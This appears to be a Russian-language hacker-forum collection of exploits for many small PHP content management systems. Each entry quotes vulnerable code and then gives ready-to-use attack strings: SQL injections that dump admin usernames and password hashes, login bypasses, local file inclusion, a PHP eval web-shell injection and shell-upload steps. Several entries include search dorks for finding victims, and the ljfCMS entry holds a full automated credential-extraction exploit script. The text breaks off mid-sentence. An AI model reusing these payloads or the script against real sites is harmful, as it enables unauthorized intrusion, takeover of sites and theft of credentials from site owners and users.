Ragnarok Online Site Engine http://sourceforge.net/projects/ro-se/ SQLi include_before.php PHP: //... $ip = getIP(); // был ли сегодня, если нет то добавим хапись вместе с реф страницей, если был, то добавим счетчик за этот день $query="SELECT count(*) as cnt FROM ".$config['ros_db'].".ros_counter WHERE DATE_FORMAT(date, '%Y%m%d')='".date("Ymd")."' and `ip`='".$ip."'"; $result=GetAll($query); if($result[0]['cnt']){ // был сегодня, обновим счетчик query("UPDATE ".$config['ros_db'].".ros_counter SET `count`=`count`+1 WHERE DATE_FORMAT(date, '%Y%m%d')='".date("Ymd")."' and `ip`='".$ip."'"); }else{ // ненбыло сегодня, добавим с реферрером query("INSERT INTO ".$config['ros_db'].".ros_counter (`count`, `ip`, `ref`, `date`) VALUES ('1', '".$ip."', '".getenv("HTTP_REFERER")."', NOW())"); } //... /include/functions.php PHP: //... function getIP() { if(getenv("HTTP_CLIENT_IP")) { $ip = getenv("HTTP_CLIENT_IP"); } elseif(getenv("HTTP_X_FORWARDED_FOR")) { $ip = getenv("HTTP_X_FORWARDED_FOR"); } else { $ip = getenv("REMOTE_ADDR"); } return $ip; } /include/db_connect.php PHP: function query($query,$DB=0){ global $config; if(isset($config['debug']) && $config['debug']){ echo $query."<br>\n"; } if($DB){ $result=mysql_query($query,$DB); }else{ $result=mysql_query($query); } if(mysql_error()){ echo mysql_error()."<br>\n"; echo "<b>query:</b>".$query."<br>\n"; return null; }else{ return $result; } } Как видно из кода у нас инъекция в хедере при чем в селекте и инсерте, покажу варианты раскрутки. Еще больше меня порадовала функция запроса, в случае ошибки она выводит саму ошибку + сам запрос, и нет никаких exit`ov и die`v. Эксплуатация: http://site.com/index.php Code: client-ip: 'and(select*from(select(name_const(version(),1)),name_const(version(),1))a)and' либо Code: client-ip: ', 'lala', NOW()) on duplicate key update a=(select 1 from(select count(*) from information_schema.tables group by concat(version(),floor(rand(0)*2)))a)-- 1
EyeX CMS http://sourceforge.net/projects/eyex/ SQLi / LFI Need: mq=off index.php PHP: $sec = $_GET['sec']; if(empty($sec)){ $sec = $_POST['sec']; } //... if(empty($sec)){ //... } }else{ $mainfun3 = $db("SELECT mod_status, mod_folder FROM "._CPBD."_mods WHERE mod_folder='$sec'",$link2); list($mod_status, $mod_folder) = $dbfetch($mainfun3); sql_cls($mainfun3); if(file_exists("Addons/mods/".$mod_folder."/main.php")){ if(is_admin($admin)){ include("Addons/mods/".$mod_folder."/main.php"); }else{ if($mod_status=="1"){ include("Addons/mods/".$mod_folder."/main.php"); }else{ header("Location: error.php?code=NOACTIVE"); } } }else{ header("Location: error.php?code=NOMOD"); } } /system/sql_functions.php PHP: define("_SQL_QUERY","mysql_query"); define("_SQL_FETCH","mysql_fetch_row"); define("_SQL_NROWS","mysql_numrows"); $db = ""._SQL_QUERY.""; $dbfetch = ""._SQL_FETCH.""; $dbnum = ""._SQL_NROWS.""; Ну думаю тут все ясно, полученный результат из выборки инклюдится. Эксплуатация: Code: http://localhost/eyexcms/index.php?sec=assdas'+union+select+1,'../../readme.txt%00'-- 1 SQLi Need: mq=off /Addons/mods/news/main.php PHP: $st = $_GET['st']; if(empty($st)){ $st = $_POST['st']; } //... function ReadStory(){ global $bgtable, $db, $dbfetch, $dbnum, $link2, $bgtable; $article = $_GET['article']; ROhead(); if(empty($article)){ wmsg(); } $result = $db("SELECT nid, ntitle, ntext, ndate, nautor, topic FROM "._CPBD."_news WHERE nid='$article'",$link2); list($nid, $ntitle, $ntext, $ndate, $nautor,$topic) = $dbfetch($result); change_tpl($nautor,$ntitle,$ntext,$ndate,$topic,$nid); comentarios($nid); ROfoot(); sql_cls($result); } //... switch($st){ case "ReadStory":ReadStory();break; case "SaveComment":SaveComment();break; default:index();break; } Эксплуатация: Code: http://localhost/eyexcms/index.php?sec=news&st=ReadStory&article=-1'+union+select+1,version(),3,4,5,6-- 1
mapmyglobe http://sourceforge.net/projects/mapmyglobe/ BSQLi /user/caccnut.php PHP: $username = $_POST['username']; $password1 = $_POST['password1']; $password2 = $_POST['password2']; $email = $_POST['email']; require_once '../lib/dbconfig.php'; require_once '../lib/liblogin.php'; require_once '../lib/config.php'; if ($password1 != $password2){ echo "Different passwords. Please try again."; exit; } if ($username == '' || is_numeric(substr($username,0,1))){ echo "Username must start with a letter. Please try again."; exit; } if (ereg("^[a-zA-Z0-9_]+@[a-zA-Z0-9\-]+\.[a-zA-Z0-9\-\.]+$]", $email)){ echo "Wrong email format. Please try again."; exit; } $rs = query('select * from user where name="'.$username.'"'); if ($row = mysql_fetch_assoc($rs)){ echo "Username already exists. Please try again."; exit; } /lib/dbconfig.php PHP: function query($q) { global $conn, $conf; $result = mysql_query($q, $conn); if (!$result) { if ($conf['prod']){ die("Invalid query"); } else{ die("Invalid query -- $q -- " . mysql_error()); } } return $result; } $conf['prod'] по умолчанию не установлен, поэтому имеем вывод в ошибке. Эксплуатация: Code: http://localhost/mapmyglobe-0.1/user/caccnt.php POST: username="and(select*from(select(name_const(version(),1)),name_const(version(),1))a)and"
CMS ElcoSite Активная XSS вида ">[XSS] в форме для комментариев по адресу Пассивная XSS ------------------------------------------> UPD <----------------------------------------- CMS RBC Contents Раскрытие путей в модуле расширенного поиска Эксплойт Условие Подвержены практически все версии движка. ------------------------------------------> UPD <----------------------------------------- SQL Injection Эксплойт Passive XSS Эксплойт Уязвимые версии <= RBC Contents Second Edition (C) Eclipse
MediaWiki, Эскейп-последовательности приводящие к XSS в IE CMS MediaWiki Уязвимая версия: 1.15.3 Из-за неправильной обработки управляющих последовательностей, создается возможность првоедения XSS в стилях CSS, при просмотре web страницы через браузер Internet Explorer. Для использования данной уязвимости необходимо вставить последвательность "\72" в формате "<U+3000>" внутри тэга объявляющего URL, т.е Эксплойт (c) Kuriaki Takashi
Email Management Software || Скрипт для создания электронного почтового сервиса Название скрипта: one_mail Сайт автора: Code: http://www.everyone.net/index.html Описание уязвимостей: Множесвенные XSS уявзвимости вида ">[XSS] Адрес уязвимой страницы: Code: http://localhost/email/scripts/collectRegistrationInfo.pl
Muzica Free Version 1 SQL Injection: Download melodie.php PHP: $id_melodie = $_GET['melodie']; $result = mysql_query("SELECT id_categorie, nume_melodie, vizualizari_melodie, data_melodie, text_melodie, download_melodie FROM ".$nume_baza.".melodie WHERE id_melodie =".$id_melodie); http://localhost/melodie.php?melodie=1 union select 1,2,3,4,5,6
230 CMS 230 CMS 1. SQLi (права админа) File:/include/edit/edit.php PHP: $sql = "SELECT * FROM ". DATABASE_PREFIX ."articles WHERE pagename = '".$_POST['pagename']."' AND id = '".$_POST['id']."' LIMIT 1"; $result = mysql_query($sql) or die (mysql_error()); PoC: POST pagename=1&id=1'+union+select+1,concat_ws(0x3a,username,password),3,4,5+from+230_users--+ 2. SQLi в INSERT (права админа) File:/include/edit/create.php PHP: $id = strip_tags($_POST['id']); $sql = "INSERT INTO ". DATABASE_PREFIX ."articles (`id`, `pagename`, `text`, `summary`, `name`) VALUES ('".$id."', '".$title."', '".$text."', '".$summary."', '".$name."')"; $result = mysql_query($sql) or die (mysql_error()); Уязвимое поле: $_POST['id']
Web Doors CMS 1. SQLi File:/sys/visit_logger.php mq = off PHP: $log_referrer=$_SERVER['HTTP_REFERER']; $checkPage=mysql_query("SELECT lvp_id FROM $logPagesTbl WHERE lvp_page LIKE '$log_page'"); PoC: Code: GET /index.php Referer: http://blabla.com' or substring(version(),1,1)=5-- 1 2. Список файлов в директории File:/sys/files/file_manager.php PHP: if(isset($_GET['path'])){ $f_way=$_GET['path']; $f_path=$f_way.'/'; ........................... $f_dir=opendir($f_path); PoC: http://localhost/sys/files/file_manager.php?path=../..
LamaCMS SQLi Need: магия off, аккаунт юзера ./modules/pages/add1.php PHP: echo '<p><h3>Add Page</h3></p>'; if(isset($_POST['title']) && !empty($_POST['title'])) { $title = $_POST['title']; $msg = $_POST['textfield']; $author = $_SESSION['username']; $query = "INSERT INTO pages (title,content,author) VALUES ('$title','$msg','$author')"; mysql_query($query); echo '<p>Your page has been added.</p>'; } else { echo '<p>Not all fields are filled in correctly. Try again.</p>'; } Example: Code: http://localhost/lamacms/index1.php?inav=pages&modapp=add Title: ololo', (select concat_ws(0x3a,username,password)as krasnoenebo from users limit 0,1), 'redsky')-- - Либо напрямую шлем пост-запрос. Идем смотреть пагу, в контенте будет вывод. Authorization bypass Need: магия в оффе ./index.php PHP: switch (@$_POST['action']) { //Case1: login form submitted case "login": $username = $_POST['username']; $password = $_POST['password']; $query = "SELECT * FROM users WHERE username='$username' AND password = md5('$password')"; $result = mysql_num_rows(mysql_query($query)); $sql = mysql_query($query); while ($results = mysql_fetch_assoc($sql)) { $membertype = $results['membertype']; } Example: Code: login: a'or(1)# password: =( Также при добавлении и редактировании чего-либо имеются скули, но смысла в их выкладывании не вижу, т.к. имеются теже зависимости, что и в предыдущих багах.
TuoCMS 1. PHP Code Execution + LFI File:/inc/mod-rfi.inc.php Need:rg = on PHP: $pos1 = strpos($pagina, "tp://"); $pos2 = strpos($pagina, "tps://"); if (($pos1 === false) && ($pos2 === false)) { } else { .............................. if (!file_exists($ifile)) { $string = "<?php exit; ?>\n"; $llog = fopen($ifile,"w+"); $string = fwrite($llog, $string); fputs($llog,"# $subject\n $body\n"); fclose($llog); }else{ $llog = fopen ($ifile,"a+"); fputs($llog,"# $subject\n $body\n"); fclose($llog); } Посмотрев на код видно, что если передавать существующий файл, то в файл впишется верху <?php exit; ?> и это нам все обломает. Поэтому мы будем записывать в конец уже имеющегося файла. PoC: 1) http://localhost/inc/mod-rfi.inc.php?pagina=http://<?php eval($_GET[cmd]); ?>&ifile=../config.dat.php 2) http://localhost/index.php?pagina=config.dat.php&cmd=phpinfo();
заливаем шелл в 4images протестировал в версии 1.7.7 нужны админские права. заходим в админку, Общие настройки->установки Разрешенные типы файлов для закачки--> добавляем расширение php, сохраняем, идем в раздел Фотографии -->Добавить фотографию выбераем наш шелл, включаем тампер дату и меняем mime на image/jpeg (для примера) шелл будет где то здесь http://www.site.com/4images/data/media/1/shell.php вместо папки 1, может быть другой номер, смотря какой альбом выбрали
Sharelor File Sender 2.0 Скачать SQL Injection: /admin/email_config.php Need: admin account; mg=off PHP: ... if($_REQUEST['email_id']){ $strSql = "select * from ".DB_TABLE_PREFIX."template_emails where email_id = '".$_REQUEST['email_id']."'"; $rsEdit = $conn->execute($strSql); } ... Пример: Code: http://test1.ru/admin/email_config.php?email_id=-1000' union select 1,concat_ws(0x3a,admin_login,admin_password),3,4 from xl_site_config SQL Injection: /view.php Need:mg=off PHP: ... $strSql = "select * from ".DB_TABLE_PREFIX."files where `key` = '".$_REQUEST['key']."'"; ... Пример: Code: http://test1.ru/view.php?key=-1' union select 1,2,3,4,5,concat_ws(0x3a,admin_login,admin_password),7,8,9,0,1,2 from xl_site_config Дорк:intext:"Sharelor.com. All Rights Reserved."
RapidSendit Clone 1.0 Скачать Читалка: download.php Need: admin account; mg=off PHP: ... if(isset($_GET['file'])) { $rand2 = $_GET['file']; } ... if (file_exists("./storagedata/".$rand2.".txt")) { $fh1=fopen("./storagedata/".$rand2.".txt",r); $foundfile= explode('|', fgets($fh1)); fclose($fh1); } ... Пример: Code: http://test1.ru/download.php?file=../password.txt%00 Дорк:intext:"Powered By: Rapidsendit Clone V.1.0"
WebsiteBaker CMS Уязвимый модуль : Event_Calendar SQL Injection /modules/event_calendar/details_popup.php PHP: $event_id = $_GET['entry_id']; $sql = "SELECT id,start_time,end_time,short_description,long_description,link_text,link_http,type FROM ".TABLE_PREFIX."mod_event_calendar WHERE id = $event_id;"; $query_entries = $database->query( $sql ); $entry = $query_entries->fetchRow(); дорк или метод заливка шелла не имеют смысла описать, все элементарно..
FácilCMS sourceforge.net/projects/facil-cms 1. SQL-inj (достаем админа) News.mysql.class.php PHP: <?php /* * Facil-CMS: Because manager your site is very easy! * ================================================== * * Authors: Wagner Santos -> [email protected] * Celina Jorge -> [email protected] * * ==================================================================== * Facil-CMS is Free Software. You can redistribute it and/or modify it * under the terms of the GNU General Public License as published by * the Free Software Foundation (either version 2.0 of the license). * ==================================================================== */ class News { var $_ID = false; var $_LANGUAGE = null; var $_TITLE = ''; var $_RESUME = ''; var $_CONTENT = ''; var $_PUBLISHER = null; var $_DATE = null; var $_STATUS = '0'; function __constructor($id = false) { if($id) { $this->getNewInfo($id); } } function News($id = false) { if($id) { $this->getNewInfo($id); } } function getId() { return $this->_ID; } function setId($id) { $this->_ID = $id; } function getLanguage() { return $this->_LANGUAGE; } function setLanguage($language) { $this->_LANGUAGE = $language; } function getTitle() { return $this->_TITLE; } function setTitle($title) { $this->_TITLE = $title; } function getResume() { return $this->_RESUME; } function setResume($resume) { $this->_RESUME = $resume; } function getContent() { return $this->_CONTENT; } function setContent($content) { $this->_CONTENT = $content; } function getPublisher() { return $this->_PUBLISHER; } function setPublisher($publisher) { $this->_PUBLISHER = $publisher; } function getDate() { return $this->_DATE; } function setDate($date) { $this->_DATE = $date; } function getStatus() { return $this->_STATUS; } function setStatus($status) { $this->_STATUS = $status; } function getNewInfo($id) { $sql = "SELECT * FROM " . _NEWS_DB_TABLE_ . " WHERE id=" . $id; $res = $GLOBALS['DB']->Execute($sql) or die($GLOBALS['DB']->ErrorMsg() . '<br />' . $sql); if($res->RecordCount() == 1) { $this->setContent($res->fields('content')); $this->setDate($res->fields('date')); $this->setId($res->fields('id')); $this->setLanguage($res->fields('language')); $this->setPublisher($res->fields('publisher')); $this->setResume($res->fields('resume')); $this->setStatus($res->fields('status')); $this->setTitle($res->fields('title')); return true; } } function Add() { if(!$this->getId()) { $sql = "INSERT INTO " . _NEWS_DB_TABLE_ . " (id, language, title, resume, content, publisher, date, status) VALUES (null, '" . $this->getLanguage() . "', '" . $this->getTitle() . "', '" . $this->getResume() . "', '" . $this->getContent() . "', " . $this->getPublisher() . ", NOW(), '" . $this->getStatus() . "')"; if($GLOBALS['DB']->Execute($sql)) { return true; } else { die($GLOBALS['DB']->ErrorMsg() . '<br />' . $sql); } } } function Erase() { if($this->getId()) { $sql = "DELETE FROM " . _NEWS_DB_TABLE_ . " WHERE id=" . $this->getId(); if($GLOBALS['DB']->Execute($sql)) { return true; } else { die($GLOBALS['DB']->ErrorMsg() . '<br />' . $sql); } } } function Update() { if($this->getId()) { $sql = "UPDATE " . _NEWS_DB_TABLE_ . " SET language='" . $this->getLanguage() . "', title='" . $this->getTitle() . "', resume='" . $this->getResume() . "', content='" . $this->getContent() . "', status='" . $this->getStatus() . "' WHERE id=" . $this->getId(); if($GLOBALS['DB']->Execute($sql)) { return true; } else { die($GLOBALS['DB']->ErrorMsg() . '<br />' . $sql); } } } function countNews($language=false) { $sql = "SELECT COUNT(*) as Total FROM " . _NEWS_DB_TABLE_ . " WHERE status='1'"; $res = $GLOBALS['DB']->Execute($sql) or die($GLOBALS['DB']->ErrorMsg() . '<br />' . $sql); return $res->fields('Total'); } function listNews($start=0, $limit=30, $language=false) { if($language) { $language = ' language="' . $language . '"'; } else { $language = ''; } if(!$_SESSION['UTYPE'] == '1') { $status = " status='1'"; } else { $status = ''; } if($language != '' || $status != '') { $where = ' WHERE'; if($language != '') { $where .= $language; } if($status != '') { if($language != '') { $where .= ' AND'; } $where .= $status; } } $sql = "SELECT * FROM " . _NEWS_DB_TABLE_ . $where . " ORDER BY date DESC LIMIT " . $start . ", " . $limit; $res = $GLOBALS['DB']->Execute($sql) or die($GLOBALS['DB']->ErrorMsg() . '<br />' . $sql); if($res->RecordCount() > 0) { $array = array(); while(!$res->EOF) { $utils = new facilUtils(); $date = $utils->formatDate($res->fields('date')); $array[] = array('id' => $res->fields('id'), 'title' => $res->fields('title'), 'date' => $date); $res->MoveNext(); } return $array; } } } ?> Code: http://temp/modules.php?modload=News&op=view&id=1+UNION+SELECT+1,2,group_concat(email,0x3a,password+SEPARATOR+0x3c62723e),4,5,6,7,8+FROM+facil_users+WHERE+type=1+--+ 2. Другой способ попасть в админку, если не получилось брутануть хэш админа (урл выше). login.php PHP: <?php /* * Facil-CMS: Because manager your site is very easy! * ================================================== * * Authors: Wagner Santos -> [email protected] * Celina Jorge -> [email protected] * * ==================================================================== * Facil-CMS is Free Software. You can redistribute it and/or modify it * under the terms of the GNU General Public License as published by * the Free Software Foundation (either version 2.0 of the license). * ==================================================================== */ session_start(); require_once('config.inc.php'); require_once(_FACIL_INCLUDES_PATH_ . '/facil-settings.php'); if($_POST['email'] && $_POST['password']) { require_once(_FACIL_MODULES_PATH_ . '/Users/i18n/lang-' . $_SESSION['FACIL_LANGUAGE'] . '.php'); require_once(_FACIL_MODULES_PATH_ . '/Users/config.php'); require_once(_FACIL_MODULES_PATH_ . '/Users/class/index.php'); $email = $_POST['email']; $password = md5($_POST['password']); $user = new Users(); $login = $user->Login($email, $password); if($login && !is_null($login) && !empty($login)) { $user = new Users($login); $_SESSION['UID'] = $user->getId(); $_SESSION['UTYPE'] = $user->getType(); $_SESSION['EMAIL'] = $user->getEmail(); $_SESSION['NAME'] = $user->getName(); header("location: modules.php?modload=Users"); } else { $js = new jsAlert(_BAD_USER_OR_PASSWORD_, 'history.go(-1);'); print $js->Alert(); } } elseif($_GET['logoff'] == "1") { foreach($_SESSION as $id => $value) { $_SESSION[$id] = false; unset($_SESSION[$id]); header("location: index.php"); } } else { header("location: index.php"); } ?> Для этого способа требуется лишь мыло админа. Code: http://temp/modules.php?modload=News&op=view&id=1+UNION+SELECT+1,2,group_concat(email+SEPARATOR+0x3c62723e),4,5,6,7,8+FROM+facil_users+WHERE+type=1+--+ Для авторизации админом потребуется лишь ввести мыло и любой пароль, при этом закомментив строку сразу после ввода мыла, то бишь: Code: [email protected] или Code: [email protected]/* 3. Заливаемся adminPhotos.php PHP: <?php /* * Facil-CMS: Because manager your site is very easy! * ================================================== * * Authors: Wagner Santos -> [email protected] * Celina Jorge -> [email protected] * * ==================================================================== * Facil-CMS is Free Software. You can redistribute it and/or modify it * under the terms of the GNU General Public License as published by * the Free Software Foundation (either version 2.0 of the license). * ==================================================================== */ require_once('header.php'); $theme = new themeFacil(); print $theme->moduleTitle('Albums'); if($_POST['op']) { $op = $_POST['op']; } elseif($_GET['op']) { $op = $_GET['op']; } else { $op = false; } switch($op) { default: break; case "add": if($_POST['album'] && $_FILES) { $util = new facilUtils(); $comment = $util->htmlentities($_POST['comment']); $photo = new Photos(); $photo->setAlbum($_POST['album']); $photo->setComment($comment); $photo->setFile($_FILES['file']['name']); if($photo->Add()) { $js = new jsAlert(_PHOTO_SUCCESSFULLY_UPLOADED_, "window.location='" . _MODULE_URL_ . "&op=view&id=" . $_POST['album'] . "';"); print $js->Alert(); } else { $js = new jsAlert(_ERROR_WHILE_UPLOADING_PHOTO_, 'history.go(-1);'); print $js->Alert(); } } break; case "edit": if($_POST['id']) { $id = $_POST['id']; } elseif($_GET['id']) { $id = $_GET['id']; } else { $id = false; } if($id) { $form = new formPhotos(); print $form->Edit($id); } break; case "change": if($_POST['id']) { $util = new facilUtils(); $comment = $util->htmlentities($_POST['comment']); $photo = new Photos($_POST['id']); $photo->setComment($comment); if($photo->Update()) { $js = new jsAlert(_PHOTO_SUCCESSFULLY_CHANGED_, "window.location='" . _MODULE_URL_ . "&op=photo&id=" . $_POST['id'] . "';"); print $js->Alert(); } else { $js = new jsAlert(_ERROR_WHILE_UPDATING_PHOTO_, 'history.go(-1);'); print $js->Alert(); } } break; case "erase": if($_GET['id']) { $photo = new Photos($_GET['id']); if($photo->getId()) { if($photo->Erase()) { $js = new jsAlert(_PHOTO_SUCCESSFULLY_ERASED_, "window.location='" . _MODULE_URL_ . "&op=view&id=" . $photo->getAlbum() . "';"); print $js->Alert(); } else { $js = new jsAlert(_ERROR_WHILE_ERASING_PHOTO_, 'history.go(-1);'); print $js->Alert(); } } } break; } require_once('footer.php'); ?> Шелл льем "в открытом виде" через картинки в меню альбомов: Code: http://temp/modules/Albums/albums/1/file/shell.php 4. XSS ИКСы там повсюду (пассивки) - форма авторизации, поиск и т.д.
ljfCMS blind sql-inj [POST method] made in china login.php PHP: <?php include "inc/head.php"; if($_POST['AName'] != '' && $_POST['APwd'] != '') { if(Admin::login($_POST)) { new ActionLog(array("LogType"=>"login_sucess","Action"=>"{$_POST[AName]}")); alert("login sucess","location","index.php"); } else { new ActionLog(array("LogType"=>"login_err","Action"=>"{$_POST[AName]},{$_POST[APwd]}")); alert("�û���������","location","login.php"); } } if($_GET['action'] == 'logout') { $_SESSION['AID'] = ''; session_destroy(); } ?> <script>if(location.href != top.location.href)top.location.href=location.href;</script> <table> <form method=post> <tr><td>�û���</td><td><input type="text" name="AName" value=''></td></tr> <tr><td>����</td><td><input type="password" name="APwd" value=''></td></tr> <tr><td></td><td><input type=submit value='��¼'></td></tr> </form> </table> <?php include 'inc/foot.php'; ?> Admin.php PHP: <?php class Admin extends Object { function Admin($arr = null) { parent::__construct($arr); } function children() { global $conn; $arr = NULL; if(is_numeric($this->AID)) { $sql = "select * from Admin where PID={$this->AID}"; $result = mysql_query($sql,$conn); while($row = mysql_fetch_array($result)) { $arr[] = new Admin($row); } } return $arr; } function parent() { global $conn; $admin = NULL; if($this->PID == 0) return $admin; $sql = "select * from Admin where AID={$this->PID}"; $result = mysql_query($sql); if($row = mysql_fetch_array($result)) { $admin = new admin($row); } return $admin; } function CPower() { return unserialize($this->CPower); } function login($postdata) { extract($postdata); global $conn; if($AName == '' || $APwd == '') alert("�û������벻Ϊ��"); $sql = "select * from Admin where AName='$AName'"; $result = mysql_query($sql); if($row = mysql_fetch_array($result)) { if($row['APwd'] == md5($APwd)) { $_SESSION['AID'] = $row['AID']; $_SESSION['AName'] = $row['AName']; $_SESSION['Power'] = $row['Power']; $_SESSION['CPower'] = $row['CPower']; return true; } } return false; } function delete() { global $conn; $sql = "delete * from Admin where AID={$this->AID}"; mysql_query($sql); $children = $this->children(); if($children) { foreach($children as $child) $child->delete(); } return true; } } /* CREATE TABLE `Admin` ( `AID` int(10) unsigned NOT NULL auto_increment, `AName` varchar(255) NOT NULL, `APwd` varchar(255) NOT NULL, `PID` int(10) unsigned NOT NULL, `AddDate` int(11) NOT NULL default '0', `Power` int(11) NOT NULL default '0', `CPower` text NOT NULL, PRIMARY KEY (`AID`), UNIQUE KEY `AName` (`AName`) ) ENGINE=MyISAM DEFAULT CHARSET=latin1 */ ?> Ну и собственно сплоит "на скорую руку": PHP: <?php @error_reporting(0); echo "\n===============\nljfCMS blind SQL-inj [POST]\nuse: exp.php site.com\n===============\n\nExploiting...\n\n"; $url = trim($argv[1]) or die(); $url = gethost($url); $path = !empty($url['path']) ? $url['path'] : '/'; $host = get($url['host'], 'AName', $path); $usr = getresult($host); $host = get($url['host'], 'APwd', $path); $pwd = getresult($host); echo "[Hacked]\nLogin: {$usr}\nPassword: {$pwd}\n\n"; function getresult($page) { $temp = @explode('entry \'', $page, 2); if(!is_array($temp)) { echo "Error\n\n"; die(); } $temp = @explode('1\'', $temp[1], 2); return $temp[0]; } function gethost($url) { return preg_match('|^http(s)?://[a-z0-9-]+(.[a-z0-9-]+)*(:[0-9]+)?(/.*)?$|i', $url); } function get($url, $val, $path = '') { $fp = @fsockopen($url, 80); $data = "AName=admin' OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY CONCAT(MID((SELECT " . $val . " FROM Admin), 1, 63), FLOOR(RAND(0)*2))) -- &APwd=qwerty"; $context = "POST " . $path . "/login.php HTTP/1.1\r\n"; $context .= "Host: " . $url . "\r\n"; $context .= "Content-Type: application/x-www-form-urlencoded\r\n"; $context .= "Content-Length: " . strlen($data) . "\r\n\r\n"; fputs($fp, $context); fputs($fp, $data); $page = ''; while($line = fgets($fp)) $page .= $line; fclose($fp); if($page) return $page; else { echo "Error\n\n"; die(); } } ?>
SharedLog Alpha 1.0 В топку скули и ИКСы, сразу заливаемся! slideshow_uploadaudio.content.php PHP: .... sess(); $_SESSION['lang'] = @$_SESSION['lang']=='' ? 'en' : $_SESSION['lang']; // $hdlTranslation->setLang( $_SESSION['lang'] ); if ( isSet($_SERVER['REQUEST_METHOD']) ) { // if ( strToUpper($_SERVER['REQUEST_METHOD'])=='POST' ) { $H = $_POST ; }else if ( strToUpper($_SERVER['REQUEST_METHOD'])=='GET' ) { $H = $_GET ; }else { $H = ( isSet($_GET['a']) ? $_GET : (isSet($_POST['a']) ? $_POST : array() ) ) ; } } $a = (isSet($_GET['a']) ? $_GET['a'] : ' ' ) ; $a = ($a==' '&&isSet($_POST['a']) ? $_POST['a'] : $a ) ; $a = strToLower( $a ) ; $H['lang'] = ( @$H['lang']!='' ? $H['lang'] : 'en' ) ; set_cookie_reffered('ev_ref_id', 'ev_http', 'ev_date'); // from lib.sys // Prevent not logged in user from accessing the pages for only logged in users. // now must use session to store userID and maybe sid also. Sid is tied to user password // it's at least a substring of md5($password) // it will be more secure to use both uid and sid, but not necessary. if ( empty($_SESSION['user']['user_idnr']) ) { if ( !isset($NOT_LOGINED_USER[$a]) ) { redirect('/'.MAIN_FILE.'?a=login¬-logined&from='.urlEncode($H['a']) ); } } else { $arrUser = $_SESSION['user']; } if (!isset($hdlGlobal)) { $hdlGlobal = new clsGlobal($objLogger, $hdlDb, $hdlCache, $hdlTpl, $hdlTranslation, $arrUser, $arrSettings, $arrResourceType); } define('DIR_AUDIO', "/monster/Content/resources/audiofiles/"); #define('DIR_AUDIO', "/usr/local/apache/sites/dcomments.com/htdocs/video_streaming/prototype/resources/audiofiles/");//Temporary location //this is used when audio file uploaded and inserted it will automatically get selected in dropdown $intAudioClipId=0; /*Language translation class for multilingual setup start*/ $H['lang'] = ( @$H['lang']!='' ? $H['lang'] : 'en' ) ; #-------------------------------------------------------------------------- # TRANSLATION #-------------------------------------------------------------------------- $GLOBALS['PARAMS']['strings_tables'] = $hdlCache->fnGetValues('arrLangs'); //$TR2 =& Translation2::factory($GLOBALS['tr2_driver'], $GLOBALS['DBINFO'], $GLOBALS['PARAMS'] ) ; $_SESSION['lang'] = @$_SESSION['lang']=='' ? 'en' : $_SESSION['lang'] ; $hdlTranslation->setLang( $_SESSION['lang'] ); #-------------------------------------------------------------------------- /*Language translation class for multilingual setup end*/ $arrLangVars=$hdlTranslation->getPage("create_slide_show"); if(intval($_GET['imageid'])!=0) { $imageid=$_GET['imageid']; } else { $imageid=$_POST['tempimageid']; } /*Handling file upload start*/ if(isset($_POST['btnupload'])) { $userid=$hdlGlobal->arrUser['user_idnr']; if($_FILES['audiofile']['tmp_name']) { $flag = false; // flag variable used to check if there was any error while image upload, Aysha 9 Apr 2007 $strUploadPath = DIR_AUDIO."/".str_replace(" ","_", $_FILES['audiofile']['name']); $hdlUploadFile= new clsUploadAVFiles(); if(!$hdlUploadFile->fnIsVirusInFile($_FILES['audiofile']['tmp_name'])) { $strResult="Error uploading File, File contains virus!"; return $strResult; } //echo $strDestinationLocation; if(move_uploaded_file($_FILES['audiofile']['tmp_name'],$strUploadPath)) { $strType = $_FILES['audiofile']['type']; $sqlResource="INSERT INTO `RESOURCE` SET `userinfo_id`=".$userid." , `resource_type_id`=3 , `description`='Auto created by Uploader' , `added_time`='".date("Y-m-d H:i:s")."', `upload_method_id`='www' , `img_type`='".$strType."' , `orig_name`='".$_FILES['audiofile']['name']."' , `deleted`='0' , `featured`='N' , `nntp_messages_id`='0'"; $hdlDb->fnInsertUpdate($sqlResource, BR.__FILE__.BR.' in '.__FUNCTION__.'(); 20050705_032027 ' ) ; $intResourceId =$hdlDb->fnLastInsertId('RESOURCE'); $strDestinationLocation = $hdlUploadFile->fnPreparePath( $intResourceId, DIR_AUDIO,$strType,"","audio"); //**********Prepare location for audio file /*echo $strUploadPath."<br />"; echo DIR_AUDIO."/".$strDestinationLocation;*/ copy($strUploadPath, DIR_AUDIO."/".$strDestinationLocation); //**************Update avatar field in db $sqlAudioFiles = "INSERT INTO AUDIO_FILES VALUES('','".$userid."','".$_FILES['audiofile']['name']."','','".$intResourceId."',UNIX_TIMESTAMP( ),'N')"; $hdlDb->fnInsertUpdate($sqlAudioFiles, BR.__FILE__.BR.' in '.__FUNCTION__.'(); 20050705_032027 ' ) ; $intAudioClipId = $hdlDb->fnLastInsertId('AUDIO_FILES'); unlink($strUploadPath); $strResult="File uploaded successfully!"; } else { $strResult= "Image Uploading failed"; } } } /* function #-------------------{ fnGetPageSlideShows }-------------------() {} */ # +-----------------------------------------------------------------------+ # | Description: Handling file upload end # | Params: $intAudioClipId - Integer audio clip id # +-----------------------------------------------------------------------+ function fnGetHTMLSelectBoxAudioList($arrUser) { $html='<select name="audiofilelist" id="audiofilelist" class="data" onChange="parent.fnGetAudioClip()">'. '<option value="none">Select Audio</option>'; $html.=fnBuildAudioDropdownDynamicOptions($arrUser); $html.='</select>'; return $html; } function fnBuildAudioDropdownDynamicOptions($arrUser) { global $hdlDb; /*Feching preloaded Audio files*/ // Temporary static files given $html='<option value="none">----Preloaded Audio Clips----</option>'. '<option value="custom_1">Audio file 1</option>'. '<option value="custom_2">Audio file 2</option>'. '<option value="custom_3">Audio file 3</option>'. '<option value="custom_4">Audio file 4</option>'; /*Fetching user's uploaded audio files*/ $userid=$arrUser['user_idnr']; if(intval($userid)!=0) { $sqlAudioFiles="SELECT id,file_name,resource_id FROM AUDIO_FILES WHERE user_id=".$userid; $arrResAudioFiles=$hdlDb->fnFetchQueryResult( $sqlAudioFiles, BR.__FILE__.BR.' in '.__FUNCTION__.'(); 20050705_032027 ' ) ; if(count($arrResAudioFiles)>0) { $html.="<option value='none'></option>"; $html.="<option value='none'>----Your Audio Clips----</option>"; $selected=""; foreach ($arrResAudioFiles as $arrRow ) { $html.="<option value='user_".$arrRow['resource_id']."'>".$arrRow['file_name']."</option>"; } } return $html; } } .... Usage: -> Регаем юзера -> В медиа-меню заливаем 